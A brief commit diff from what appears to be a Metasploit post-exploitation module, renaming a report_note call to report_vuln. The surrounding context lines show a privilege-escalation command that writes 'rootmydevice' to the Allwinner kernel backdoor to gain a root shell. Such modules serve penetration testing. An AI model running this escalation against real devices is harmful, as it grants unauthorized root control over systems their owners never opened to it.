change report_note to report_vuln per note
parent
c621f689b2
commit
4242bbdf55
|
@ -50,7 +50,7 @@ class MetasploitModule < Msf::Post
|
|||
cmd_exec("echo rootmydevice > #{backdoor}")
|
||||
if is_root?
|
||||
print_good "Privilege Escalation Successful"
|
||||
report_note(
|
||||
report_vuln(
|
||||
:host => session,
|
||||
:type => "host.escalation",
|
||||
:data => "Escalated to root shell via Allwinner backdoor"
|
||||
|
|
Loading…
Reference in New Issue